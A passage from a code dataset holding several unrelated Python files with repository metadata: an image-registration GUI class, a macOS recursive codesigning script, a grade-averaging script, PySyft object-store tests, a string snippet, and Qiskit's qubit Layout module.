dialog.control_points_path is not None\n assert dialog.joint_transform_path is not None\n self._navigator.load_file(\n dialog.source_img_path,\n dialog.target_img_path,\n dialog.control_points_path,\n dialog.joint_transform_path,\n source_coords_file=dialog.source_coords_path,\n transf_coords_file=dialog.transf_coords_path,\n )\n elif dialog.selection_mode == NappingDialog.SelectionMode.DIR:\n assert dialog.matching_strategy is not None\n assert dialog.source_img_path is not None\n assert dialog.target_img_path is not None\n assert dialog.control_points_path is not None\n assert dialog.joint_transform_path is not None\n dialog.control_points_path.mkdir(exist_ok=True)\n dialog.joint_transform_path.mkdir(exist_ok=True)\n if dialog.transf_coords_path is not None:\n dialog.transf_coords_path.mkdir(exist_ok=True)\n self._navigator.load_dir(\n dialog.source_img_path,\n dialog.target_img_path,\n dialog.control_points_path,\n dialog.joint_transform_path,\n {\n NappingDialog.MatchingStrategy.ALPHABETICAL: (\n NappingNavigator.MatchingStrategy.ALPHABETICAL\n ),\n NappingDialog.MatchingStrategy.FILENAME: (\n NappingNavigator.MatchingStrategy.FILENAME\n ),\n NappingDialog.MatchingStrategy.REGEX: (\n NappingNavigator.MatchingStrategy.REGEX\n ),\n }[dialog.matching_strategy],\n source_regex=dialog.source_regex,\n target_regex=dialog.target_regex,\n source_coords_regex=dialog.source_coords_regex,\n source_coords_dir=dialog.source_coords_path,\n transf_coords_dir=dialog.transf_coords_path,\n )\n else:\n raise RuntimeError(\"Unexpected dialog selection mode\")\n self.exec(app=app)\n\n def restart(self) -> None:\n assert self._current_app is not None\n assert self._current_widget is not None\n assert self._current_source_viewer is not None\n assert self._current_target_viewer is not None\n self._current_source_viewer.close()\n self._current_target_viewer.close()\n self._current_widget.close()\n self._current_app.exit(returnCode=NappingApplication.RESTART_RETURN_CODE)\n self._current_app = None\n self._current_widget = None\n self._current_source_viewer = None\n self._current_target_viewer = None\n\n def get_current_joint_transform(self) -> Optional[np.ndarray]:\n if self._current_transform is not None:\n current_joint_transform = self._current_transform\n if self._pre_transform is not None:\n current_joint_transform = current_joint_transform @ self._pre_transform\n if self._post_transform is not None:\n current_joint_transform = self._post_transform @ current_joint_transform\n return current_joint_transform\n return None\n\n def get_current_control_points(self) -> Optional[pd.DataFrame]:\n if (\n self._current_source_viewer is not None\n and self._current_target_viewer is not None\n ):\n current_source_control_points = (\n self._current_source_viewer.get_control_points()\n )\n current_target_control_points = (\n self._current_target_viewer.get_control_points()\n )\n if (\n current_source_control_points is not None\n and current_target_control_points is not None\n ):\n return pd.merge(\n current_source_control_points,\n current_target_control_points,\n left_index=True,\n right_index=True,\n suffixes=(\"_source\", \"_target\"),\n )\n return None\n\n def set_current_control_points(\n self, current_control_points: Optional[pd.DataFrame]\n ) -> None:\n assert self._current_source_viewer is not None\n assert self._current_target_viewer is not None\n with self._block_write():\n if current_control_points is not None:\n current_source_control_points = current_control_points.loc[\n :, [\"x_source\", \"y_source\"]\n 
].copy()\n current_target_control_points = current_control_points.loc[\n :, [\"x_target\", \"y_target\"]\n ].copy()\n current_source_control_points.columns = [\"x\", \"y\"]\n current_target_control_points.columns = [\"x\", \"y\"]\n self._current_source_viewer.set_control_points(\n current_source_control_points\n )\n self._current_target_viewer.set_control_points(\n current_target_control_points\n )\n else:\n self._current_source_viewer.set_control_points(None)\n self._current_target_viewer.set_control_points(None)\n\n def get_current_control_point_residuals(\n self,\n ) -> Optional[np.ndarray]:\n if self._current_transform is not None:\n current_control_points = self.get_current_control_points()\n if current_control_points is not None and not current_control_points.empty:\n assert self._transform_type is not None\n tf = self._transform_type(self._current_transform)\n return tf.residuals(\n current_control_points.loc[:, [\"x_source\", \"y_source\"]].to_numpy(),\n current_control_points.loc[:, [\"x_target\", \"y_target\"]].to_numpy(),\n )\n return None\n\n def _create_dialog(self) -> NappingDialog:\n return NappingDialog()\n\n def _create_source_viewer(self, img_file: Union[str, PathLike]) -> NappingViewer:\n return NappingViewer(img_file)\n\n def _create_target_viewer(self, img_file: Union[str, PathLike]) -> NappingViewer:\n return NappingViewer(img_file)\n\n def _create_widget(self) -> NappingWidget:\n return NappingWidget(self)\n\n def _handle_control_points_changed(\n self, viewer: NappingViewer, control_points: Optional[pd.DataFrame]\n ) -> None:\n current_control_points = self.get_current_control_points()\n if not self._write_blocked and current_control_points is not None:\n assert self._navigator.current_control_points_file is not None\n with self._navigator.current_control_points_file.open(\n mode=\"wb\", buffering=0\n ) as f:\n current_control_points.to_csv(f, mode=\"wb\")\n self._update_current_transform()\n current_joint_transform = self.get_current_joint_transform()\n if not self._write_blocked and current_joint_transform is not None:\n np.save(\n self._navigator.current_joint_transform_file,\n current_joint_transform,\n )\n self._update_current_transf_coords()\n if not self._write_blocked and self._current_transf_coords is not None:\n assert self._navigator.current_transf_coords_file is not None\n with self._navigator.current_transf_coords_file.open(\n mode=\"wb\", buffering=0\n ) as f:\n self._current_transf_coords.to_csv(f, mode=\"wb\", index=False)\n assert self._current_widget is not None\n self._current_widget.refresh()\n\n def _update_current_transform(self) -> None:\n self._current_transform = None\n current_control_points = self.get_current_control_points()\n assert current_control_points is not None\n if current_control_points.shape[0] >= 3:\n assert self._transform_type is not None\n tf = self._transform_type()\n if tf.estimate(\n current_control_points.loc[:, [\"x_source\", \"y_source\"]].to_numpy(),\n current_control_points.loc[:, [\"x_target\", \"y_target\"]].to_numpy(),\n ):\n self._current_transform = tf.params\n\n def _update_current_transf_coords(self) -> None:\n self._current_transf_coords = None\n current_joint_transform = self.get_current_joint_transform()\n if (\n self._current_source_coords is not None\n and current_joint_transform is not None\n ):\n x = np.ones((self._current_source_coords.shape[0], 3))\n x[:, :2] = self._current_source_coords.loc[:, [\"X\", \"Y\"]].to_numpy()\n self._current_transf_coords = self._current_source_coords.copy()\n 
self._current_transf_coords.loc[:, [\"X\", \"Y\"]] = (\n current_joint_transform @ x.T\n ).T[:, :2]\n\n @contextmanager\n def _block_write(self):\n self._write_blocked = True\n yield\n self._write_blocked = False\n\n @property\n def navigator(self) -> NappingNavigator:\n return self._navigator\n\n @property\n def current_app(self) -> Optional[QApplication]:\n return self._current_app\n\n @property\n def current_widget(self) -> Optional[NappingWidget]:\n return self._current_widget\n\n @property\n def current_source_viewer(self) -> Optional[NappingViewer]:\n return self._current_source_viewer\n\n @property\n def current_target_viewer(self) -> Optional[NappingViewer]:\n return self._current_target_viewer\n\n @property\n def transform_type(self) -> Optional[Type[ProjectiveTransform]]:\n return self._transform_type\n\n @transform_type.setter\n def transform_type(\n self, transform_type: Optional[Type[ProjectiveTransform]]\n ) -> None:\n self._transform_type = transform_type\n\n @property\n def pre_transform(self) -> Optional[np.ndarray]:\n return self._pre_transform\n\n @pre_transform.setter\n def pre_transform(self, pre_transform: Optional[np.ndarray]) -> None:\n self._pre_transform = pre_transform\n\n @property\n def post_transform(self) -> Optional[np.ndarray]:\n return self._post_transform\n\n @post_transform.setter\n def post_transform(self, post_transform: Optional[np.ndarray]) -> None:\n self._post_transform = post_transform\n\n @property\n def current_transform(self) -> Optional[np.ndarray]:\n return self._current_transform\n\n @property\n def current_source_coords(self) -> Optional[pd.DataFrame]:\n return self._current_source_coords\n\n @property\n def current_transf_coords(self) -> Optional[pd.DataFrame]:\n return self._current_transf_coords\n","repo_name":"BodenmillerGroup/napping","sub_path":"napping/_napping_application.py","file_name":"_napping_application.py","file_ext":"py","file_size_in_byte":15691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"74545425015","text":"\"\"\"\nhttps://stackoverflow.com/questions/49748988/how-to-codesign-dmg-and-app-inside-it\nThis code helps with recursive code-signing of all files in a given directory\n\nExample command line may look like this\nExample command line may look like this\n\npython recursive_code_sign.py --directory=/Users/m/mini_cc3d_install_1/\n--certificate-label=\"Developer ID Application: Indiana University (XXX)\"\n--keychain-path=/Users/m/Library/Keychains/login.keychain-db\n\n\n\"\"\"\nimport argparse\nimport os\nfrom os.path import *\nfrom pathlib import Path\nimport subprocess\nimport numpy as np\n\n\ndef process_cml():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--directory', required=True, type=str)\n parser.add_argument('--certificate-label', required=True, type=str)\n parser.add_argument('--keychain-path', required=True)\n\n args = parser.parse_args()\n\n return args\n\ndef determine_if_binary_file(fname):\n core, ext = splitext(fname)\n if ext in ['.pyc', 'py']:\n return False\n\n if ext in ['.so', 'dylib']:\n return True\n\n textchars = bytearray({7,8,9,10,12,13,27} | set(range(0x20, 0x100)) - {0x7f})\n is_binary_string = lambda bytes: bool(bytes.translate(None, textchars))\n flag = is_binary_string(open(fname, 'rb').read(1024))\n\n return flag\n\ndef codesign_directory(directory, certificate_label, keychain_path):\n \"\"\"\n\n :param directory:\n :param certificate_label:\n :param keychain_path:\n :return:\n \"\"\"\n\n # traverse root 
directory, and list directories as dirs and files as files\n    for root, dirs, files in os.walk(directory):\n\n        path = root.split(os.sep)\n        for file in files:\n            stem, ext = splitext(file)\n\n            fname = join(root, file)\n\n            if not determine_if_binary_file(fname=fname):\n\n                continue\n\n            print(fname)\n            # we enable hardened runtime using --options runtime\n            # see https://stackoverflow.com/questions/52905940/how-to-codesign-and-enable-the-hardened-runtime-for-a-3rd-party-cli-on-xcode\n            cmd = f'codesign -f -v --options runtime --timestamp -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n            # cmd = f'codesign -f -v -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n            os.system(cmd)\n\n\ndef codesign_directory_entitlement(directory, certificate_label, keychain_path, entitlement_file):\n    \"\"\"\n\n    :param directory:\n    :param certificate_label:\n    :param keychain_path:\n    :param entitlement_file:\n    :return:\n    \"\"\"\n\n    # traverse root directory, and list directories as dirs and files as files\n    for root, dirs, files in os.walk(directory):\n\n        path = root.split(os.sep)\n        for file in files:\n            stem, ext = splitext(file)\n\n            fname = join(root, file)\n\n            if not determine_if_binary_file(fname=fname):\n\n                continue\n\n            print(fname)\n            # we enable hardened runtime using --options runtime\n            # see https://stackoverflow.com/questions/52905940/how-to-codesign-and-enable-the-hardened-runtime-for-a-3rd-party-cli-on-xcode\n            # cmd = f'codesign -f -v --options runtime --timestamp -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n            # cmd = f'codesign -f --entitlement {entitlement_file} -v -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n            # cmd = f'codesign -f --entitlement {entitlement_file} -v --options runtime --timestamp -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n            cmd = f'codesign -v --options runtime --timestamp -s \"{certificate_label}\" -f --entitlement {entitlement_file} --keychain {keychain_path} {fname}'\n            os.system(cmd)\n            # cmd = f'codesign -f --entitlement {entitlement_file} -v -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n            # os.system(cmd)\n\n            # cmd = f'codesign -v --options runtime --timestamp -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n            # os.system(cmd)\n            # f'codesign -f --entitlement {entitlement_file}'\n            # os.system(cmd)\n\n\n\n\ndef main():\n    args = process_cml()\n    directory = args.directory\n\n    certificate_label = args.certificate_label\n    keychain_path = args.keychain_path\n\n    codesign_directory(directory=directory, certificate_label=certificate_label, keychain_path=keychain_path)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"CompuCell3D/cc3d_build_scripts","sub_path":"mac/build_scripts_py3/rpath_handlers/recursive_code_sign.py","file_name":"recursive_code_sign.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32533487261","text":"\nr = open(\"header.txt\")\nls = r.readlines()\nr.close()\n\n# It's a regular list!\n# The header is element 0 of the list\n# The whole list from element 1 to the end\nls2 = ls[1:]\n\nsuma = 0\nfor l in ls2:\n    nota = float(l.strip())\n    suma += nota\n\nprint(\"AVERAGE\",suma/len(ls2))\n\n'''\nr = open(\"header.txt\")\nls = r.readlines()\nr.close()\n\nsuma = 0\nfor l in ls:\n    nota = float(l.strip())\n    suma += nota\n\nprint(\"AVERAGE\",suma/len(ls))\n'''\n\n\n\n\n\n\n\n\n","repo_name":"jorgedg6/material-computacion","sub_path":"INTRO A 
PYTHON/Codigos/10. Archivos/header.py","file_name":"header.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32800945890","text":"import torch\n\nfrom syft.generic import object_storage\n\n\ndef test_clear_objects():\n    \"\"\"\n    Checks the clear_objects method\n    \"\"\"\n    # obj_storage is a wrapper object to a collection of objects\n    obj_storage = object_storage.ObjectStore()\n\n    x = torch.tensor(1)\n    obj_storage.set_obj(x)\n\n    objs = obj_storage.current_objects() # Returns a copy of the objects in obj_storage (here: x)\n\n    assert len(objs) == 1\n    assert objs[x.id] == x\n\n    ret_val = obj_storage.clear_objects() # Completely removes all objects from obj_storage\n\n    objs = obj_storage.current_objects()\n    assert len(objs) == 0\n    assert ret_val is None\n\n\ndef test_set_obj_takes_ownership(workers):\n    me = workers[\"me\"]\n    bob = workers[\"bob\"]\n\n    x = torch.tensor(1)\n\n    x.owner = bob\n\n    me.object_store.set_obj(x)\n\n    objs = me.object_store._objects\n\n    assert objs[x.id] == x\n    assert objs[x.id].owner == workers[\"me\"]\n","repo_name":"shazi4399/PySyft-a73b13aa84","sub_path":"test/generic/test_object_storage.py","file_name":"test_object_storage.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"6494515909","text":"# Python3 implementation of above approach\n\n# Instantiate the string\ns = \"Mr John Smith\"\n\n# Trim the given string\ns = s.strip()\n\n# Replace all spaces (regex \\\\s) with %20\ns = s.replace(' ', \"%20\")\n\n# Display the result\nprint(s)\n\n# This code is generated by Yvonne Onuorah\n","repo_name":"yvonneonu/test5","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26678174937","text":"from __future__ import annotations\nfrom typing import List\nfrom dataclasses import dataclass\n\nfrom qiskit import circuit\nfrom qiskit.circuit.quantumregister import Qubit, QuantumRegister\nfrom qiskit.transpiler.exceptions import LayoutError\nfrom qiskit.converters import isinstanceint\n\n\nclass Layout:\n    \"\"\"Two-way dict to represent a Layout.\"\"\"\n\n    __slots__ = (\"_regs\", \"_p2v\", \"_v2p\")\n\n    def __init__(self, input_dict=None):\n        \"\"\"Construct a Layout from a bijective dictionary, mapping\n        virtual qubits to physical qubits\"\"\"\n        self._regs = []\n        self._p2v = {}\n        self._v2p = {}\n        if input_dict is not None:\n            if not isinstance(input_dict, dict):\n                raise LayoutError(\"Layout constructor takes a dict\")\n            self.from_dict(input_dict)\n\n    def __repr__(self):\n        \"\"\"Representation of a Layout\"\"\"\n        str_list = []\n        for key, val in self._p2v.items():\n            str_list.append(f\"{key}: {val},\")\n        if str_list:\n            str_list[-1] = str_list[-1][:-1]\n        return \"Layout({\\n\" + \"\\n\".join(str_list) + \"\\n})\"\n\n    def from_dict(self, input_dict):\n        \"\"\"Populates a Layout from a dictionary.\n\n        The dictionary must be a bijective mapping between\n        virtual qubits (tuple) and physical qubits (int).\n\n        Args:\n            input_dict (dict):\n                e.g.::\n\n                {(QuantumRegister(3, 'qr'), 0): 0,\n                 (QuantumRegister(3, 'qr'), 1): 1,\n                 (QuantumRegister(3, 'qr'), 2): 2}\n\n                Can be written more concisely as follows:\n\n                * virtual to physical::\n\n                    {qr[0]: 0,\n                     qr[1]: 1,\n                     qr[2]: 2}\n\n                * physical to virtual::\n\n                    {0: qr[0],\n                     1: qr[1],\n                     2: qr[2]}\n        \"\"\"\n        for key, 
value in input_dict.items():\n            virtual, physical = Layout.order_based_on_type(key, value)\n            self._p2v[physical] = virtual\n            if virtual is None:\n                continue\n            self._v2p[virtual] = physical\n\n    @staticmethod\n    def order_based_on_type(value1, value2):\n        \"\"\"Decides which one is physical/virtual based on the type. Returns (virtual, physical)\"\"\"\n        if isinstanceint(value1) and isinstance(value2, (Qubit, type(None))):\n            physical = int(value1)\n            virtual = value2\n        elif isinstanceint(value2) and isinstance(value1, (Qubit, type(None))):\n            physical = int(value2)\n            virtual = value1\n        else:\n            raise LayoutError(\n                \"The map (%s -> %s) has to be a (Bit -> integer)\"\n                \" or the other way around.\" % (type(value1), type(value2))\n            )\n        return virtual, physical\n\n    def __getitem__(self, item):\n        if item in self._p2v:\n            return self._p2v[item]\n        if item in self._v2p:\n            return self._v2p[item]\n        raise KeyError(f\"The item {item} does not exist in the Layout\")\n\n    def __contains__(self, item):\n        return item in self._p2v or item in self._v2p\n\n    def __setitem__(self, key, value):\n        virtual, physical = Layout.order_based_on_type(key, value)\n        self._set_type_checked_item(virtual, physical)\n\n    def _set_type_checked_item(self, virtual, physical):\n        old = self._v2p.pop(virtual, None)\n        self._p2v.pop(old, None)\n        old = self._p2v.pop(physical, None)\n        self._v2p.pop(old, None)\n\n        self._p2v[physical] = virtual\n        if virtual is not None:\n            self._v2p[virtual] = physical\n\n    def __delitem__(self, key):\n        if isinstance(key, int):\n            del self._v2p[self._p2v[key]]\n            del self._p2v[key]\n        elif isinstance(key, Qubit):\n            del self._p2v[self._v2p[key]]\n            del self._v2p[key]\n        else:\n            raise LayoutError(\n                \"The key to remove should be of the form\"\n                \" (Qubit or integer), and %s was provided\" % (type(key),)\n            )\n\n    def __len__(self):\n        return len(self._p2v)\n\n    def __eq__(self, other):\n        if isinstance(other, Layout):\n            return self._p2v == other._p2v and self._v2p == other._v2p\n        return False\n\n    def copy(self):\n        \"\"\"Returns a copy of a Layout instance.\"\"\"\n        layout_copy = type(self)()\n\n        layout_copy._regs = self._regs.copy()\n        layout_copy._p2v = self._p2v.copy()\n        layout_copy._v2p = self._v2p.copy()\n\n        return layout_copy\n\n    def add(self, virtual_bit, physical_bit=None):\n        \"\"\"\n        Adds a map element between `bit` and `physical_bit`. If `physical_bit` is not\n        defined, `bit` will be mapped to a new physical bit.\n\n        Args:\n            virtual_bit (tuple): A (qu)bit. For example, (QuantumRegister(3, 'qr'), 2).\n            physical_bit (int): A physical bit. For example, 3.\n        \"\"\"\n        if physical_bit is None:\n            if len(self._p2v) == 0:\n                physical_bit = 0\n            else:\n                max_physical = max(self._p2v)\n                # Fill any gaps in the existing bits\n                for physical_candidate in range(max_physical):\n                    if physical_candidate not in self._p2v:\n                        physical_bit = physical_candidate\n                        break\n                # If there are no free bits in the allocated physical bits add new ones\n                else:\n                    physical_bit = max_physical + 1\n\n        self[virtual_bit] = physical_bit\n\n    def add_register(self, reg):\n        \"\"\"Adds physical qubits at the end to map each bit in reg.\n\n        Args:\n            reg (Register): A (qu)bit Register. 
For example, QuantumRegister(3, 'qr').\n \"\"\"\n self._regs.append(reg)\n for bit in reg:\n if bit not in self:\n self.add(bit)\n\n def get_registers(self):\n \"\"\"\n Returns the registers in the layout [QuantumRegister(2, 'qr0'), QuantumRegister(3, 'qr1')]\n Returns:\n Set: A set of Registers in the layout\n \"\"\"\n return set(self._regs)\n\n def get_virtual_bits(self):\n \"\"\"\n Returns the dictionary where the keys are virtual (qu)bits and the\n values are physical (qu)bits.\n \"\"\"\n return self._v2p\n\n def get_physical_bits(self):\n \"\"\"\n Returns the dictionary where the keys are physical (qu)bits and the\n values are virtual (qu)bits.\n \"\"\"\n return self._p2v\n\n def swap(self, left, right):\n \"\"\"Swaps the map between left and right.\n\n Args:\n left (tuple or int): Item to swap with right.\n right (tuple or int): Item to swap with left.\n Raises:\n LayoutError: If left and right have not the same type.\n \"\"\"\n if type(left) is not type(right):\n raise LayoutError(\"The method swap only works with elements of the same type.\")\n temp = self[left]\n self[left] = self[right]\n self[right] = temp\n\n def combine_into_edge_map(self, another_layout):\n \"\"\"Combines self and another_layout into an \"edge map\".\n\n For example::\n\n self another_layout resulting edge map\n qr_1 -> 0 0 <- q_2 qr_1 -> q_2\n qr_2 -> 2 2 <- q_1 qr_2 -> q_1\n qr_3 -> 3 3 <- q_0 qr_3 -> q_0\n\n The edge map is used to compose dags via, for example, compose.\n\n Args:\n another_layout (Layout): The other layout to combine.\n Returns:\n dict: A \"edge map\".\n Raises:\n LayoutError: another_layout can be bigger than self, but not smaller.\n Otherwise, raises.\n \"\"\"\n edge_map = {}\n\n for virtual, physical in self._v2p.items():\n if physical not in another_layout._p2v:\n raise LayoutError(\n \"The wire_map_from_layouts() method does not support when the\"\n \" other layout (another_layout) is smaller.\"\n )\n edge_map[virtual] = another_layout[physical]\n\n return edge_map\n\n def reorder_bits(self, bits) -> list[int]:\n \"\"\"Given an ordered list of bits, reorder them according to this layout.\n\n The list of bits must exactly match the virtual bits in this layout.\n\n Args:\n bits (list[Bit]): the bits to reorder.\n\n Returns:\n List: ordered bits.\n \"\"\"\n order = [0] * len(bits)\n\n # the i-th bit is now sitting in position j\n for i, v in enumerate(bits):\n j = self[v]\n order[i] = j\n\n return order\n\n @staticmethod\n def generate_trivial_layout(*regs):\n \"\"\"Creates a trivial (\"one-to-one\") Layout with the registers and qubits in `regs`.\n\n Args:\n *regs (Registers, Qubits): registers and qubits to include in the layout.\n Returns:\n Layout: A layout with all the `regs` in the given order.\n \"\"\"\n layout = Layout()\n for reg in regs:\n if isinstance(reg, QuantumRegister):\n layout.add_register(reg)\n else:\n layout.add(reg)\n return layout\n\n @staticmethod\n def from_intlist(int_list, *qregs):\n \"\"\"Converts a list of integers to a Layout\n mapping virtual qubits (index of the list) to\n physical qubits (the list values).\n\n Args:\n int_list (list): A list of integers.\n *qregs (QuantumRegisters): The quantum registers to apply\n the layout to.\n Returns:\n Layout: The corresponding Layout object.\n Raises:\n LayoutError: Invalid input layout.\n \"\"\"\n if not all(isinstanceint(i) for i in int_list):\n raise LayoutError(\"Expected a list of ints\")\n if len(int_list) != len(set(int_list)):\n raise LayoutError(\"Duplicate values not permitted; Layout is bijective.\")\n 
num_qubits = sum(reg.size for reg in qregs)\n        # Check if list is too short to cover all qubits\n        if len(int_list) != num_qubits:\n            raise LayoutError(\n                f\"Integer list length ({len(int_list)}) must equal number of qubits \"\n                f\"in circuit ({num_qubits}): {int_list}.\"\n            )\n        out = Layout()\n        main_idx = 0\n        for qreg in qregs:\n            for idx in range(qreg.size):\n                out[qreg[idx]] = int_list[main_idx]\n                main_idx += 1\n            out.add_register(qreg)\n        if main_idx != len(int_list):\n            for int_item in int_list[main_idx:]:\n                out[int_item] = None\n        return out\n\n    @staticmethod\n    def from_qubit_list(qubit_list, *qregs):\n        \"\"\"\n        Populates a Layout from a list containing virtual\n        qubits, Qubit or None.\n\n        Args:\n            qubit_list (list):\n                e.g.: [qr[0], None, qr[2], qr[3]]\n            *qregs (QuantumRegisters): The quantum registers to apply\n                the layout to.\n        Returns:\n            Layout: the corresponding Layout object\n        Raises:\n            LayoutError: If the elements are not Qubit or None\n        \"\"\"\n        out = Layout()\n        for physical, virtual in enumerate(qubit_list):\n            if virtual is None:\n                continue\n            if isinstance(virtual, Qubit):\n                if virtual in out._v2p:\n                    raise LayoutError(\"Duplicate values not permitted; Layout is bijective.\")\n                out[virtual] = physical\n            else:\n                raise LayoutError(\"The list should contain elements of the Bits or NoneTypes\")\n        for qreg in qregs:\n            out.add_register(qreg)\n        return out\n\n\n@dataclass\nclass TranspileLayout:\n    r\"\"\"Layout attributes from output circuit from transpiler.\n\n    The transpiler in general is unitary-preserving up to permutations caused\n    by setting and applying initial layout during the :ref:`layout_stage`\n    and :class:`~.SwapGate` insertion during the :ref:`routing_stage`. This\n    class provides an interface to reason about these permutations caused by\n    the :mod:`~qiskit.transpiler`. In general, the normal interface to access\n    and reason about the layout transformations made by the transpiler is to\n    use the helper methods defined on this class.\n\n    For example, looking at the initial layout, the transpiler can potentially\n    remap the order of the qubits in your circuit as it fits the circuit to\n    the target backend. If the input circuit was:\n\n    .. plot::\n       :include-source:\n\n       from qiskit.circuit import QuantumCircuit, QuantumRegister\n\n       qr = QuantumRegister(3, name=\"MyReg\")\n       qc = QuantumCircuit(qr)\n       qc.h(0)\n       qc.cx(0, 1)\n       qc.cx(0, 2)\n       qc.draw(\"mpl\")\n\n    Then during the layout stage the transpiler reorders the qubits to be:\n\n    .. plot::\n       :include-source:\n\n       from qiskit import QuantumCircuit\n\n       qc = QuantumCircuit(3)\n       qc.h(2)\n       qc.cx(2, 1)\n       qc.cx(2, 0)\n       qc.draw(\"mpl\")\n\n    then the output of the :meth:`.initial_virtual_layout` would be\n    equivalent to::\n\n        Layout({\n            qr[0]: 2,\n            qr[1]: 1,\n            qr[2]: 0,\n        })\n\n    (it is also this attribute in the :meth:`.QuantumCircuit.draw` and\n    :func:`.circuit_drawer` which is used to display the mapping of qubits to\n    positions in circuit visualizations post-transpilation)\n\n    Building on the above example for final layout, if the transpiler needed to\n    insert swap gates during routing so the output circuit became:\n\n    .. 
plot::\n       :include-source:\n\n       from qiskit import QuantumCircuit\n\n       qc = QuantumCircuit(3)\n       qc.h(2)\n       qc.cx(2, 1)\n       qc.swap(0, 1)\n       qc.cx(2, 1)\n       qc.draw(\"mpl\")\n\n    then the output of the :meth:`routing_permutation` method would be::\n\n        [1, 0, 2]\n\n    which maps the qubits at each position to their final position after any swap\n    insertions caused by routing.\n\n    There are three public attributes associated with the class; however, these\n    are mostly provided for backwards compatibility and represent the internal\n    state from the transpiler. They are defined as:\n\n    * :attr:`initial_layout` - This attribute is used to model the\n      permutation caused by the :ref:`layout_stage`. It contains a\n      :class:`~.Layout` object that maps the input :class:`~.QuantumCircuit`\\s\n      :class:`~.circuit.Qubit` objects to the position in the output\n      :class:`.QuantumCircuit.qubits` list.\n    * :attr:`input_qubit_mapping` - This attribute is used to retain\n      input ordering of the original :class:`~.QuantumCircuit` object. It\n      maps the virtual :class:`~.circuit.Qubit` object from the original circuit\n      (and :attr:`initial_layout`) to its corresponding position in\n      :attr:`.QuantumCircuit.qubits` in the original circuit. This\n      is needed when computing the permutation of the :class:`Operator` of\n      the circuit (and used by :meth:`.Operator.from_circuit`).\n    * :attr:`final_layout` - This is a :class:`~.Layout` object used to\n      model the output permutation caused by any :class:`~.SwapGate`\\s\n      inserted into the :class:`~.QuantumCircuit` during the\n      :ref:`routing_stage`. It maps the output circuit's qubits from\n      :class:`.QuantumCircuit.qubits` in the output circuit to the final\n      position after routing. It is **not** a mapping from the original\n      input circuit's position to the final position at the end of the\n      transpiled circuit. If you need this, you can use\n      :meth:`.final_index_layout` to generate it. If this is set to ``None``,\n      this indicates that routing was not run and it can be considered\n      equivalent to a trivial layout with the qubits from the output circuit's\n      :attr:`~.QuantumCircuit.qubits` list.\n    \"\"\"\n\n    initial_layout: Layout\n    input_qubit_mapping: dict[circuit.Qubit, int]\n    final_layout: Layout | None = None\n    _input_qubit_count: int | None = None\n    _output_qubit_list: List[Qubit] | None = None\n\n    def initial_virtual_layout(self, filter_ancillas: bool = False) -> Layout:\n        \"\"\"Return a :class:`.Layout` object for the initial layout.\n\n        This returns a mapping of virtual :class:`~.circuit.Qubit` objects in the input\n        circuit to the physical qubit selected during layout. This is analogous\n        to the :attr:`.initial_layout` attribute.\n\n        Args:\n            filter_ancillas: If set to ``True`` only qubits in the input circuit\n                will be in the returned layout. 
Any ancilla qubits added to the\n output circuit will be filtered from the returned object.\n Returns:\n A layout object mapping the input circuit's :class:`~.circuit.Qubit`\n objects to the selected physical qubits.\n \"\"\"\n if not filter_ancillas:\n return self.initial_layout\n return Layout(\n {\n k: v\n for k, v in self.initial_layout.get_virtual_bits().items()\n if self.input_qubit_mapping[k] < self._input_qubit_count\n }\n )\n\n def initial_index_layout(self, filter_ancillas: bool = False) -> List[int]:\n \"\"\"Generate an initial layout as an array of integers\n\n Args:\n filter_ancillas: If set to ``True`` any ancilla qubits added\n to the transpiler will not be included in the output.\n\n Return:\n A layout array that maps a position in the array to its new position in the output\n circuit.\n \"\"\"\n\n virtual_map = self.initial_layout.get_virtual_bits()\n if filter_ancillas:\n output = [None] * self._input_qubit_count\n else:\n output = [None] * len(virtual_map)\n for index, (virt, phys) in enumerate(virtual_map.items()):\n if filter_ancillas and index >= self._input_qubit_count:\n break\n pos = self.input_qubit_mapping[virt]\n output[pos] = phys\n return output\n\n def routing_permutation(self) -> List[int]:\n \"\"\"Generate a final layout as an array of integers\n\n If there is no :attr:`.final_layout` attribute present then that indicates\n there was no output permutation caused by routing or other transpiler\n transforms. In this case the function will return a list of ``[0, 1, 2, .., n]``\n to indicate this\n\n Returns:\n A layout array that maps a position in the array to its new position in the output\n circuit\n \"\"\"\n if self.final_layout is None:\n return list(range(len(self._output_qubit_list)))\n virtual_map = self.final_layout.get_virtual_bits()\n return [virtual_map[virt] for virt in self._output_qubit_list]\n\n def final_index_layout(self, filter_ancillas: bool = True) -> List[int]:\n \"\"\"Generate the final layout as an array of integers\n\n This method will generate an array of final positions for each qubit in the output circuit.\n For example, if you had an input circuit like::\n\n qc = QuantumCircuit(3)\n qc.h(0)\n qc.cx(0, 1)\n qc.cx(0, 2)\n\n and the output from the transpiler was::\n\n tqc = QuantumCircuit(3)\n qc.h(2)\n qc.cx(2, 1)\n qc.swap(0, 1)\n qc.cx(2, 1)\n\n then the return from this function would be a list of::\n\n [2, 0, 1]\n\n because qubit 0 in the original circuit's final state is on qubit 3 in the output circuit,\n qubit 1 in the original circuit's final state is on qubit 0, and qubit 2's final state is\n on qubit. 
